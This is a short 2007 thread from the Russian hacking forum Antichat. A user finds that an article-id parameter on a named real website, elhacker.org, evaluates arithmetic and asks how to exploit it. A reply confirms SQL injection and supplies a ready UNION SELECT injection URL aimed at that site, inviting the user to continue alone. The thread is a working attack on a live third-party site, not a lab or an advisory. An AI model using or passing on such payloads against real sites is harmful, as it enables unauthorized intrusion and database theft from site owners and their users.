Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   elhacker (https://forum.antichat.xyz/showthread.php?t=42945)

Doom123 24.06.2007 00:24

elhacker
 
Здраствуйте.... Вот хотел найти уязвимость на какомнить хак портале ну и чтото подозрительное надыбал вроде sql иньекция(По описанию в одной статье) и мне нужна помощь

Вот страница например

Код:

http://www.elhacker.org/index.php?Ver=Articulo&Id=298
а вот 2ая страница

Код:

http://www.elhacker.org/index.php?Ver=Articulo&Id=297
При выполнении запроса

Код:

http://www.elhacker.org/index.php?Ver=Articulo&Id=298-1
Выводит страницу под номером 297

ну вот ток я не знаю можно ли это использовать в одной статье было написано что при таком раскладе возможна есть уязвимость может ли ктото описать как её использовать если это вообще возможно...

Зарание спасибо и прошу сильно не пинать)

ice1k 24.06.2007 00:31

Цитата:

Сообщение от Doom123
Зарание спасибо и прошу сильно не пинать)

Кто же тебя будет пинать, если ты учишься.
Насчёт инъекции - да, ты прав.
_http://www.elhacker.org/index.php?Ver=Articulo&Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19/*
Дальше можешь сам. А так же почитай статьи, чтобы понять - что, да как, и чтобы полностью осознавать, что ты делаешь.

Doom123 24.06.2007 00:36

спасибо тебе большое за ответ! + тебе)

_Great_ 24.06.2007 10:08

ЗЫ.
Порадовала надпись снизу: Greets to Ru hackers from cucuruz :)
нажмите ctrl-a =)


Время: 11:15